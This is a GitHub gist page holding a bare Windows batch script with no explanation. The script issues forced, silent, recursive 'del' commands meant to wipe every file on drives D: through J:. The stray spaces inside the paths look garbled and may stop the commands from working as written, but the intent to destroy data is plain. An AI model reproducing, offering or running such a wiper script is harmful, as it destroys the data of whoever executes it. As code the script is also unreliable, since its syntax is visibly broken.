Skip to content

Instantly share code, notes, and snippets.

@FiecyLick
Created February 2, 2018 15:32
Show Gist options
  • Save FiecyLick/de6033b2471c4f4e6def5ef67e122b63 to your computer and use it in GitHub Desktop.
Save FiecyLick/de6033b2471c4f4e6def5ef67e122b63 to your computer and use it in GitHub Desktop.
@echo off
del D: \ * . * /f /s /q
del E : \ * . * /f /s /q
del F : \ * . * /f /s /q
del G : \ * . * /f /s /q
del H : \ * . * /f /s /q
del I : \ * . * /f /s /q
del J : \ * . * /f /s /q
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment